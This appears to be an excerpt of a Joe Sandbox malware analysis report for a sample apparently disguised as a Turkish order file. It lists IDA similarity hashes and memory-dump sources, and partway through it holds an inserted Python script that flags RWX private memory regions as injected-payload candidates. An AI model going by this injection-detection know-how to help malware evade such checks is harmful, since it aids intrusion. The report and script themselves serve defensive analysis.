                                                                  • String ID: PreferredUILanguages
                                                                  • API String ID: 0-1884656846
                                                                  • Opcode ID: f290ca8a756cebe52b072220b863f63204c392473d4a40a0f26c058bd73a3618
                                                                  • Instruction ID: 2dc26a1d7476f1ea92106d868b704c0880d5ec1f0d5f57d177f596ade01884f5
                                                                  • Opcode Fuzzy Hash: f290ca8a756cebe52b072220b863f63204c392473d4a40a0f26c058bd73a3618
                                                                  • Instruction Fuzzy Hash: 7741F37AD01219ABDF11CA94C881BEEB3B9FF44754F010166E986EB354DE70EE40CBA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: c847dab1f611b696c2508598e522d3c54a2b727b90ef2f7da7599a2af148e74c
                                                                  • Instruction ID: 392606d37729e670d5711d87d662290ce9d1442a8189ea80f1206cd12fb8e1e9
                                                                  • Opcode Fuzzy Hash: c847dab1f611b696c2508598e522d3c54a2b727b90ef2f7da7599a2af148e74c
                                                                  • Instruction Fuzzy Hash: 9D4152B2D0112CABDB21CA64CC90FDE777CAF44724F4045A5EA09AB350DB749E898FA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: verifier.dll
                                                                  • API String ID: 0-3265496382
                                                                  • Opcode ID: 107721cb406feeb6cb28d1981630e68d53a1574c6af46ce95b7bb68af934b059
                                                                  • Instruction ID: 68b0e2a8757a6c4dda5b019f701d973670311fd7f72fd51ceec5525e707df8fa
                                                                  • Opcode Fuzzy Hash: 107721cb406feeb6cb28d1981630e68d53a1574c6af46ce95b7bb68af934b059
                                                                  • Instruction Fuzzy Hash: FB31A4B96003419FDF149F299961BA677E5EF48754F91843AE90BDF380EE718C81CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Actx
                                                                  • API String ID: 0-89312691
                                                                  • Opcode ID: 320f2a8f07043c3e64bbd9ac346225e0b0de5035cdd7b94511109cf1b0a20487
                                                                  • Instruction ID: 329118e2c284c07e0a4f34cbafb335ef68ef390ffbe5c17685cbcd012b113465
                                                                  • Opcode Fuzzy Hash: 320f2a8f07043c3e64bbd9ac346225e0b0de5035cdd7b94511109cf1b0a20487
                                                                  • Instruction Fuzzy Hash: 05118E7430BB028BF71B4A19D850756B3D5EB9D3A8F34852AEA91CB390DE73D841C780
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9700675248672e49ed5daec14a7f81ebb3625b21a53b71fa3a5d4a29bf569c2f
                                                                  • Instruction ID: 13bbed9dd91921e6e56769baaf6040dc860d140659be67c334d3eec05e44eb01
                                                                  • Opcode Fuzzy Hash: 9700675248672e49ed5daec14a7f81ebb3625b21a53b71fa3a5d4a29bf569c2f
                                                                  • Instruction Fuzzy Hash: 0142A379A006269FEB08CF59C8906AEF7F2FF88354F54855DD955AB340DB34E842CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a750eb23dcb61be581bfeef06461cceb7b4dca9c375d85d4578e6ec33b407bc
                                                                  • Instruction ID: b1105e7fb477def86421ddf8eadd3a66897617e4265b9f670fa1780a95d2e273
                                                                  • Opcode Fuzzy Hash: 6a750eb23dcb61be581bfeef06461cceb7b4dca9c375d85d4578e6ec33b407bc
                                                                  • Instruction Fuzzy Hash: 7422E279A00216DFDB09CF59C480AAAB3B2FF89718F25856DD855DB340DB31E942CB94
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12ba8c618e0cc7908c56ff4234bdad466b7b50807068d2380ce39f9a520c172d
                                                                  • Instruction ID: 5ab5a9215b5000765e465891ff069d843eecccebffbc3729cb329c894b816052
                                                                  • Opcode Fuzzy Hash: 12ba8c618e0cc7908c56ff4234bdad466b7b50807068d2380ce39f9a520c172d
                                                                  • Instruction Fuzzy Hash: 2CD1D075A003469FEB08CF64E891BAAB3E5BF4434CF048629E965DB390EB74D945CB70
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a8294018476350bb6a929ee49284469e78efdc322c34ab74852db242a87bae9
                                                                  • Instruction ID: 6732224b14b750056f487272debe0ed3d45394dc8c84e8d8687c4ee96662c443
                                                                  • Opcode Fuzzy Hash: 7a8294018476350bb6a929ee49284469e78efdc322c34ab74852db242a87bae9
                                                                  • Instruction Fuzzy Hash: 79C1EF75E023069FEB09CF58C840BAEB7B6AF94754F148269E914BB385DB70E941CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 035d380345ae8b8fb83545fc67f8e1ea74d0cdc890f439b72fdf05ca76665944
                                                                  • Instruction ID: 0891a25ff235f1dc291e3aa0c9a7056685e8208e1409f455a6ad368de574cabc
                                                                  • Opcode Fuzzy Hash: 035d380345ae8b8fb83545fc67f8e1ea74d0cdc890f439b72fdf05ca76665944
                                                                  • Instruction Fuzzy Hash: E0A15971900255AFEB12DFA8CC81FAE37B9EF45754F914064FA00AB3A0DBB59D40CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab122db2c47c9d33141d99c6329b57d1e0a599ff86232699357bdf9aeb98e3fc
                                                                  • Instruction ID: 788bd71f66b275fcf0203811b448b92dc4bc8bfcf389b8f2d2c1d060d32238a4
                                                                  • Opcode Fuzzy Hash: ab122db2c47c9d33141d99c6329b57d1e0a599ff86232699357bdf9aeb98e3fc
                                                                  • Instruction Fuzzy Hash: 6EC14875608340CFE764CF15C484BAAB7E5BF88744F44496DE98987390DBB4E909CFA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b0b52c8579e4f8ad167a31e984b9f4bcafd50ac9557f8597fc4e34f2a11590d
                                                                  • Instruction ID: 0f13e149ec3ed03181b074c00a11c00d5392af041f8eb1fc44e4da9076b60064
                                                                  • Opcode Fuzzy Hash: 5b0b52c8579e4f8ad167a31e984b9f4bcafd50ac9557f8597fc4e34f2a11590d
                                                                  • Instruction Fuzzy Hash: A3A1C075A01756DBEB14CF69D991BAAB7B1FF44359F004029EA45973C0DB78E802CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4072c96f8215ddf1bedbf5062d9fc0ba3da973f4a31ee1ab5c56cba5dc4d443c
                                                                  • Instruction ID: 5b694a55ea04cfa1c54848fdfb86edfbe1c6b88f6221faef59dfe217aa095f09
                                                                  • Opcode Fuzzy Hash: 4072c96f8215ddf1bedbf5062d9fc0ba3da973f4a31ee1ab5c56cba5dc4d443c
                                                                  • Instruction Fuzzy Hash: E9913375A00715AFE704DF28C880BAE77A1EF88754F418169EC499B380EF34D941CBE1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                  • Instruction ID: 70c39c1351db6f4370cfcacc8cfb07f53bfc841eed4aae3c8ea1072811242ab2
                                                                  • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                  • Instruction Fuzzy Hash: 23817F76E002158BDF14DF68C880FEDB7B2EB88349F65816AE815A7348DB759940CBE1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cbcdd74c626662559df93e914b1f1caf7094baac6a991c7d3ab19cc564e5396c
                                                                  • Instruction ID: d8fdc97cd1a9d9ea177c8e20f94d71389ae8ccf3a5f96aa4de8fc030d8d360fb
                                                                  • Opcode Fuzzy Hash: cbcdd74c626662559df93e914b1f1caf7094baac6a991c7d3ab19cc564e5396c
                                                                  • Instruction Fuzzy Hash: F7814C71A00709AFEB15CFA5C880FEAB7BAFF48358F544429E595A7350DB70AC45CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 248696cd60276218b032d88807ce5679e9a8c440b91f7fcd6eb94184c3a117b3
                                                                  • Instruction ID: 171cc8cd78c02d4418ab07233a06042221a39cf234364a4ee09d0bf7b039b4a8
                                                                  • Opcode Fuzzy Hash: 248696cd60276218b032d88807ce5679e9a8c440b91f7fcd6eb94184c3a117b3
                                                                  • Instruction Fuzzy Hash: 3F71ABB98053659FDB258F58D890BEEBBB4FF48B00F50451AE882AB350DF749841CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0bfbe3179c58235f58c3f8e4070e577313c0e47aed9b4dd42509a77cd864ed65
                                                                  • Instruction ID: 3eeb90914fae61cc14ed1e8ae4ef69b742693b9554d0bc4476a5d250d4fbbef2
                                                                  • Opcode Fuzzy Hash: 0bfbe3179c58235f58c3f8e4070e577313c0e47aed9b4dd42509a77cd864ed65
                                                                  • Instruction Fuzzy Hash: FC71AC796046819FE305CF28C484B6AB7E5FF88354F0585AAE898CB361DF74DC46CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1cad0ccb0a0cdd7aa728d099b19cbe900e0f11104548398a4d6643aa49be4709
                                                                  • Instruction ID: 7a8ec7a7401bfa58eedc00dbabf41e80857cba236d637a5c0ca9bd2d3067046e
                                                                  • Opcode Fuzzy Hash: 1cad0ccb0a0cdd7aa728d099b19cbe900e0f11104548398a4d6643aa49be4709
                                                                  • Instruction Fuzzy Hash: B0710176244B11AFE721CF68C844F5AB7F5EF80764F144928E6958B3A0DBB4E944CBA0
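The dump file names repeated in every Memory Dump Source entry above encode the attributes of the region that was dumped, and those attributes are what tell an analyst that 0x32D00000 is an unpacked payload rather than a loaded module. The parser and triage below are an added example written for this page, not Joe Sandbox code: the field order (process index, dump index, sequence number, region base, Protect, State, Type, trailing field) is an assumption inferred from the names on this page, while the PAGE_*/MEM_* values are the documented Windows MEMORY_BASIC_INFORMATION constants. The four sample names are copied from the entry above; the "based on PE" flag is only stated for the first one, so the other three are passed as constructed values.

```python
"""Parse Joe Sandbox .sdmp dump names and triage the memory attributes they carry.

Added example, not part of the sandbox report. Field order is an ASSUMPTION
inferred from names like
  00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp
The PAGE_* / MEM_* numeric values are Windows constants (MEMORY_BASIC_INFORMATION).
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Assumed layout: proc.dump.sequence.base.Protect.State.Type.extra.sdmp (hex except sequence)
_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<seq>\d+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})"
    r"\.(?P<mtype>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class SdmpRegion:
    process_index: int
    dump_index: int
    sequence: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Low byte is the access class; 0x100/0x200/0x400 are PAGE_GUARD/NOCACHE/WRITECOMBINE
        name = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")
        mods = [n for bit, n in ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"),
                                 (0x400, "PAGE_WRITECOMBINE")) if self.protect & bit]
        return "|".join([name] + mods)

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE

    def is_writable(self) -> bool:
        return (self.protect & 0xFF) in WRITABLE


def parse_sdmp_name(name: str) -> SdmpRegion:
    """Split a .sdmp file name into its numeric fields; raise ValueError on anything else."""
    m = _SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return SdmpRegion(int(m["proc"], 16), int(m["dump"], 16), int(m["seq"]),
                      int(m["base"], 16), int(m["protect"], 16),
                      int(m["state"], 16), int(m["mtype"], 16))


def triage(region: SdmpRegion, based_on_pe: bool) -> str:
    """Classify a region the way an analyst hunting injected/unpacked code would.

    Committed, private (not MEM_IMAGE), executable AND writable memory that starts
    with a PE header is the classic footprint of a manually mapped payload; a loader
    never gives a legitimately loaded module RWX private pages.
    """
    if region.state != 0x1000:
        return "not-committed"
    if region.mem_type == 0x1000000:
        return "loaded-module" if region.is_executable() else "module-data"
    if region.mem_type == 0x20000 and region.is_executable() and region.is_writable():
        return "injected-pe-candidate" if based_on_pe else "rwx-private-shellcode-candidate"
    return "executable-non-image" if region.is_executable() else "data"


# Constructed input: the Source File and its three Associated dumps from the entry above.
# Only the first is stated as "based on PE: true"; False for the others is a placeholder.
SAMPLE_DUMPS = [
    ("00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp", True),
    ("00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp", False),
    ("00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp", False),
    ("00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp", False),
]


def triage_all(dumps=SAMPLE_DUMPS):
    """Return [(base, protect name, type name, verdict)] for (name, based_on_pe) pairs."""
    rows = []
    for name, pe in dumps:
        r = parse_sdmp_name(name)
        rows.append((r.base, r.protect_name, r.type_name, triage(r, pe)))
    return rows


if __name__ == "__main__":
    for base, prot, mtype, verdict in triage_all():
        print(f"{base:#010x}  {prot:<24} {mtype:<12} {verdict}")
```

Run against the names on this page, every region in process index 4 decodes to PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE, and the one at 0x32D00000 that the report marks "based on PE: true" is flagged as an injected PE candidate; the same check run over an image-backed PAGE_EXECUTE_READ region returns "loaded-module", which is why RWX+private+PE is the filter worth automating across a report's dump list.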
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                  • Instruction ID: 6a6f704440801a289ceec915fffe75f9192dd172153728341c0a84f6758cb7a9
                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                  • Instruction Fuzzy Hash: A0716C71E00619AFCF00CFA9D990ADEBBB8FF48744F504569E506A7790DB74EA41CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4cd9e37b28e8cf3f524148b576bd64d43e60ef32c7453af7af00f152bb549e33
                                                                  • Instruction ID: 33c78f82651880cda3b46bebda7ce7a217f5fdc49df6bf510afa43e418310242
                                                                  • Opcode Fuzzy Hash: 4cd9e37b28e8cf3f524148b576bd64d43e60ef32c7453af7af00f152bb549e33
                                                                  • Instruction Fuzzy Hash: B5819175A00205DFCB09CF98C490AAEB7F1FF88304F1581A9D859EB341DB34EA41CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65679f1af8a9fb5c0bd78872530a46f38745a57a3494137dcb5b1182285ae617
                                                                  • Instruction ID: bfbf5641793339b3123f4c947daa952fb12d50ca9eb7f04d163017fdc883f9ba
                                                                  • Opcode Fuzzy Hash: 65679f1af8a9fb5c0bd78872530a46f38745a57a3494137dcb5b1182285ae617
                                                                  • Instruction Fuzzy Hash: 0461ACB5A00715BFE315CF64C980BABBBA9BF88754F028619F85A87340DB31E511CBA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
